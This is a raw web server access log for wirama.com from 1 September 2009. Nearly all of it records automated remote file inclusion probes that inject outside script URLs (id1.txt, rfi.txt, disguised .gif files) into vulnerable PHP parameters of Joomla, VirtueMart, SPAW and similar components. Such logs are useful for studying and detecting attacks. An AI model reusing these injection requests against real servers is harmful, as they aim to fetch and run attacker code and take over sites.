110.45.146.223 - - [01/Sep/2009:11:15:37 -0700] "GET /logs/access_090501.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:11:15:43 -0700] "GET /skin/zero_vote/error.php?dir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:11:15:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:11:15:44 -0700] "GET /logs/access_090531.log%20%20//skin/zero_vote/error.php?dir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:11:15:45 -0700] "GET /logs/access_090531.log%20%20//skin/zero_vote/error.php?dir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:11:15:45 -0700] "GET /skin/zero_vote/error.php?dir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:11:15:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:11:16:13 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:11:16:14 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.125.74.87 - - [01/Sep/2009:11:16:38 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/idi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
121.125.74.87 - - [01/Sep/2009:11:16:38 -0700] "GET /logs/access_090701.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/idi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
121.125.74.87 - - [01/Sep/2009:11:16:38 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/idi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
77.221.130.31 - - [01/Sep/2009:11:16:59 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.31 - - [01/Sep/2009:11:16:59 -0700] "GET /logs/access_090701.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.31 - - [01/Sep/2009:11:16:59 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:11:17:14 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [01/Sep/2009:11:17:14 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
63.249.159.4 - - [01/Sep/2009:11:17:54 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://cr0s.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
63.249.159.4 - - [01/Sep/2009:11:17:54 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://cr0s.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
77.221.130.31 - - [01/Sep/2009:11:18:08 -0700] "GET /logs/access_090531.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:20:27 -0700] "GET /logs/access_090701.log%20%20/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:20:33 -0700] "GET /logs/access_090701.log%20%20/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:20:33 -0700] "GET /logs/access_090701.log%20%20/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:20:40 -0700] "GET /logs/access_090701.log%20%20/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.125.74.87 - - [01/Sep/2009:11:20:47 -0700] "GET /logs/access_090701.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.wirama.com"
121.125.74.87 - - [01/Sep/2009:11:20:47 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.wirama.com"
121.125.74.87 - - [01/Sep/2009:11:20:47 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.wirama.com"
77.221.130.31 - - [01/Sep/2009:11:20:48 -0700] "GET /logs/access_090531.log%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
121.125.74.87 - - [01/Sep/2009:11:20:59 -0700] "GET /logs/access_090801.log%22%20target=%22_blank///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "wirama.com"
121.125.74.87 - - [01/Sep/2009:11:20:59 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "wirama.com"
121.125.74.87 - - [01/Sep/2009:11:20:59 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "wirama.com"
211.189.18.73 - - [01/Sep/2009:11:21:28 -0700] "GET /logs/access_090331.log%20%20/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:21:29 -0700] "GET /logs/access_090331.log%20%20/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:11:22:26 -0700] "GET /logs/access_090701.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:22:36 -0700] "GET /logs/access_090331.log%20%20/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:22:42 -0700] "GET /logs/access_090331.log%20%20/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:23:37 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:23:37 -0700] "GET /logs/access_090701.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:23:37 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:23:50 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:23:50 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:23:50 -0700] "GET /logs/access_090701.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:24:02 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:24:02 -0700] "GET /logs/access_090701.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:24:02 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:24:03 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:24:03 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:24:03 -0700] "GET /logs/access_090701.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.125.74.87 - - [01/Sep/2009:11:27:29 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/idi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
121.125.74.87 - - [01/Sep/2009:11:27:29 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/idi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
125.243.207.194 - - [01/Sep/2009:11:28:00 -0700] "GET /logs/access_090701.log//appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
125.243.207.194 - - [01/Sep/2009:11:28:01 -0700] "GET /appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
125.243.207.194 - - [01/Sep/2009:11:28:02 -0700] "GET /logs//appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:29:28 -0700] "GET /spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:29:28 -0700] "GET /logs/access_090701.log%20%20/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:29:29 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:29:50 -0700] "GET /logs/access.log%20%20/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.250.92.97 - - [01/Sep/2009:11:29:55 -0700] "GET /logs/access_090701.log//appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
61.250.92.97 - - [01/Sep/2009:11:29:55 -0700] "GET /appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
61.250.92.97 - - [01/Sep/2009:11:29:56 -0700] "GET /logs//appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
211.218.40.180 - - [01/Sep/2009:11:30:08 -0700] "GET /logs/access_090701.log//appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
211.218.40.180 - - [01/Sep/2009:11:30:09 -0700] "GET /appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
211.218.40.180 - - [01/Sep/2009:11:30:10 -0700] "GET /logs//appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:11:30:10 -0700] "GET /logs/access_090531.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.122.72.216 - - [01/Sep/2009:11:30:30 -0700] "GET /logs/access_090701.log//appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
222.122.72.216 - - [01/Sep/2009:11:30:30 -0700] "GET /appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
222.122.72.216 - - [01/Sep/2009:11:30:31 -0700] "GET /logs//appserv/main.php?appserv_root=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
121.125.74.87 - - [01/Sep/2009:11:31:47 -0700] "GET /logs/access_090531.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.winewise.de//administrator/modules/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.wirama.com"
218.150.78.235 - - [01/Sep/2009:11:31:54 -0700] "GET /logs//?INCLUDE_FOLDER=http://www.milanoinc.com//js/id.txt??? HTTP/1.1" 200 2856 "-" "libwww-perl/5.79" "www.wirama.com"
218.150.78.235 - - [01/Sep/2009:11:31:54 -0700] "GET /?INCLUDE_FOLDER=http://www.milanoinc.com//js/id.txt??? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "www.wirama.com"
218.150.78.235 - - [01/Sep/2009:11:31:54 -0700] "GET /logs/access_090501.log//?INCLUDE_FOLDER=http://www.milanoinc.com//js/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
218.150.78.235 - - [01/Sep/2009:11:31:59 -0700] "GET /?INCLUDE_FOLDER=http://www.libertybaptistofdc.org/webcalendar/includes/id.txt??? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "www.wirama.com"
218.150.78.235 - - [01/Sep/2009:11:31:59 -0700] "GET /logs/access_090501.log//?INCLUDE_FOLDER=http://www.libertybaptistofdc.org/webcalendar/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
218.150.78.235 - - [01/Sep/2009:11:32:00 -0700] "GET /logs//?INCLUDE_FOLDER=http://www.libertybaptistofdc.org/webcalendar/includes/id.txt??? HTTP/1.1" 200 2856 "-" "libwww-perl/5.79" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:11:32:04 -0700] "GET /logs/access_090531.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:11:32:04 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:11:32:04 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:11:32:06 -0700] "GET /logs/access_090531.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:11:32:06 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:11:32:06 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
218.150.78.235 - - [01/Sep/2009:11:32:42 -0700] "GET /logs/access_090501.log//?INCLUDE_FOLDER=http://www.intermission21.com/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
218.150.78.235 - - [01/Sep/2009:11:32:42 -0700] "GET /logs//?INCLUDE_FOLDER=http://www.intermission21.com/bbs/id.txt?? HTTP/1.1" 200 2856 "-" "libwww-perl/5.79" "www.wirama.com"
218.150.78.235 - - [01/Sep/2009:11:32:42 -0700] "GET /?INCLUDE_FOLDER=http://www.intermission21.com/bbs/id.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:33:09 -0700] "GET /spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:33:09 -0700] "GET /logs/access_090701.log%20%20/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:33:10 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.30.87.93 - - [01/Sep/2009:11:33:16 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:33:34 -0700] "GET /logs/access.log%20%20/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:11:35:51 -0700] "GET /logs/access_090531.log%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
218.237.219.250 - - [01/Sep/2009:11:35:52 -0700] "GET /spaw_control.class.php?spaw_root=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
218.237.219.250 - - [01/Sep/2009:11:35:52 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
218.237.219.250 - - [01/Sep/2009:11:35:52 -0700] "GET /logs/access_090701.log/spaw_control.class.php?spaw_root=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
69.107.0.59 - - [01/Sep/2009:11:35:56 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 AutoPager/0.5.2.2 (http://www.teesoft.info/)" "www.wirama.com"
124.1.246.2 - - [01/Sep/2009:11:36:00 -0700] "GET /logs/access_090531.log%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
218.237.219.250 - - [01/Sep/2009:11:38:04 -0700] "GET /logs/access.log/spaw_control.class.php?spaw_root=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
218.237.219.250 - - [01/Sep/2009:11:40:19 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
218.237.219.250 - - [01/Sep/2009:11:40:19 -0700] "GET /spaw_control.class.php?spaw_root=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
62.141.56.136 - - [01/Sep/2009:11:43:42 -0700] "GET /logs/include/img.php?spaw_root=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
62.141.56.136 - - [01/Sep/2009:11:43:43 -0700] "GET /include/img.php?spaw_root=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "wirama.com"
213.0.87.120 - - [01/Sep/2009:11:44:23 -0700] "GET /logs/access_090701.log%20%20/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:44:23 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:44:23 -0700] "GET /spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:44:54 -0700] "GET /logs/access.log%20%20/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:11:47:36 -0700] "GET /logs/access_090701.log/spaw_control.class.php?spaw_root=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
67.225.196.53 - - [01/Sep/2009:11:47:36 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
62.141.56.136 - - [01/Sep/2009:11:47:49 -0700] "GET /include/img.php?spaw_root=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:48:16 -0700] "GET /spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:48:16 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:48:16 -0700] "GET /logs/access_090701.log%20%20/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:11:48:37 -0700] "GET /logs/access.log%20%20/spaw_control.class.php?spaw_root=http://www.chumo.net/bbs/include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
